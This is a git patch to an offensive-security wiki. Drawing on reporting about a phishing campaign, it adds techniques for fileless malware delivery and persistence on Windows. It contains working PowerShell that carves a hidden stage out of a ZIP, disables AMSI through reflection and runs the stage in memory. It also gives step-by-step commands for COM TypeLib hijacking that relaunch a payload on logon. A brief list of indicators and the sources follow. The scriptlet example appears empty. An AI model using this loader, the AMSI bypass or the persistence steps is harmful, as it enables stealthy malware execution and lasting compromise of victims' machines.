From d81ff58ade07d65d70bc6b16461506ca9b3feef8 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 26 Aug 2025 18:39:45 +0000 Subject: [PATCH] Add content from: ZipLine Campaign: A Sophisticated Phishing Attack Targeting ... --- .../phishing-documents.md | 55 +++++++++++++++- .../com-hijacking.md | 65 +++++++++++++++++++ 2 files changed, 118 insertions(+), 2 deletions(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index 519818c77..033e39c1f 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -21,7 +21,7 @@ DOCX files referencing a remote template (File –Options –Add-ins –Manage: ### External Image Load Go to: _Insert --> Quick Parts --> Field_\ -_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http://\/whatever +_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http:///whatever ![](<../../images/image (155).png>) @@ -167,6 +167,57 @@ Don't forget that you cannot only steal the hash or the authentication but also - [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack) - [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8) -{{#include ../../banners/hacktricks-training.md}} +## LNK Loaders + ZIP-Embedded Payloads (fileless chain) +Highly effective campaigns deliver a ZIP that contains two legitimate decoy documents (PDF/DOCX) and a malicious .lnk. The trick is that the actual PowerShell loader is stored inside the ZIP’s raw bytes after a unique marker, and the .lnk carves and runs it fully in memory. +Typical flow implemented by the .lnk PowerShell one-liner: + +1) Locate the original ZIP in common paths: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, and the parent of the current working directory. +2) Read the ZIP bytes and find a hardcoded marker (e.g., xFIQCV). Everything after the marker is the embedded PowerShell payload. +3) Copy the ZIP to %ProgramData%, extract there, and open the decoy .docx to appear legitimate. +4) Bypass AMSI for the current process: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true +5) Deobfuscate the next stage (e.g., remove all # characters) and execute it in memory. + +Example PowerShell skeleton to carve and run the embedded stage: + +```powershell +$marker = [Text.Encoding]::ASCII.GetBytes('xFIQCV') +$paths = @( + "$env:USERPROFILE\Desktop", "$env:USERPROFILE\Downloads", "$env:USERPROFILE\Documents", + "$env:TEMP", "$env:ProgramData", (Get-Location).Path, (Get-Item '..').FullName +) +$zip = Get-ChildItem -Path $paths -Filter *.zip -ErrorAction SilentlyContinue -Recurse | Sort-Object LastWriteTime -Descending | Select-Object -First 1 +if(-not $zip){ return } +$bytes = [IO.File]::ReadAllBytes($zip.FullName) +$idx = [System.MemoryExtensions]::IndexOf($bytes, $marker) +if($idx -lt 0){ return } +$stage = $bytes[($idx + $marker.Length) .. ($bytes.Length-1)] +$code = [Text.Encoding]::UTF8.GetString($stage) -replace '#','' +[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) +Invoke-Expression $code +``` + +Notes +- Delivery often abuses reputable PaaS subdomains (e.g., *.herokuapp.com) and may gate payloads (serve benign ZIPs based on IP/UA). +- The next stage frequently decrypts base64/XOR shellcode and executes it via Reflection.Emit + VirtualAlloc to minimize disk artifacts. + +Persistence used in the same chain +- COM TypeLib hijacking of the Microsoft Web Browser control so that IE/Explorer or any app embedding it re-launches the payload automatically. See details and ready-to-use commands here: + +{{#ref}} +../../windows-hardening/windows-local-privilege-escalation/com-hijacking.md +{{#endref}} + +Hunting/IOCs +- ZIP files containing the ASCII marker string (e.g., xFIQCV) appended to the archive data. +- .lnk that enumerates parent/user folders to locate the ZIP and opens a decoy document. +- AMSI tampering via [System.Management.Automation.AmsiUtils]::amsiInitFailed. +- Long-running business threads ending with links hosted under trusted PaaS domains. + +## References + +- [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/) +- [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661) + +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md index d4f4cf7d9..ed8d55369 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md +++ b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md @@ -78,6 +78,71 @@ Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5 Then, you can just create the HKCU entry and everytime the user logs in, your backdoor will be fired. +--- + +## COM TypeLib Hijacking (script: moniker persistence) + +Type Libraries (TypeLib) define COM interfaces and are loaded via `LoadTypeLib()`. When a COM server is instantiated, the OS may also load the associated TypeLib by consulting registry keys under `HKCR\TypeLib\{LIBID}`. If the TypeLib path is replaced with a **moniker**, e.g. `script:C:\...\evil.sct`, Windows will execute the scriptlet when the TypeLib is resolved – yielding a stealthy persistence that triggers when common components are touched. + +This has been observed against the Microsoft Web Browser control (frequently loaded by Internet Explorer, apps embedding WebBrowser, and even `explorer.exe`). + +### Steps (PowerShell) + +1) Identify the TypeLib (LIBID) used by a high-frequency CLSID. Example CLSID often abused by malware chains: `{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}` (Microsoft Web Browser). + +```powershell +$clsid = '{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}' +$libid = (Get-ItemProperty -Path "Registry::HKCR\\CLSID\\$clsid\\TypeLib").'(default)' +$ver = (Get-ChildItem "Registry::HKCR\\TypeLib\\$libid" | Select-Object -First 1).PSChildName +"CLSID=$clsid LIBID=$libid VER=$ver" +``` + +2) Point the per-user TypeLib path to a local scriptlet using the `script:` moniker (no admin rights required): + +```powershell +$dest = 'C:\\ProgramData\\Udate_Srv.sct' +New-Item -Path "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32" -Force | Out-Null +Set-ItemProperty -Path "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32" -Name '(default)' -Value "script:$dest" +``` + +3) Drop a minimal JScript `.sct` that relaunches your primary payload (e.g. a `.lnk` used by the initial chain): + +```xml + + + + + +``` + +4) Triggering – opening IE, an application that embeds the WebBrowser control, or even routine Explorer activity will load the TypeLib and execute the scriptlet, re-arming your chain on logon/reboot. + +Cleanup +```powershell +# Remove the per-user TypeLib hijack +Remove-Item -Recurse -Force "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver" 2>$null +# Delete the dropped scriptlet +Remove-Item -Force 'C:\\ProgramData\\Udate_Srv.sct' 2>$null +``` + +Notes +- You can apply the same logic to other high-frequency COM components; always resolve the real `LIBID` from `HKCR\CLSID\{CLSID}\TypeLib` first. +- On 64-bit systems you may also populate the `win64` subkey for 64-bit consumers. + +## References + +- [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661) +- [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/) + {{#include ../../banners/hacktricks-training.md}}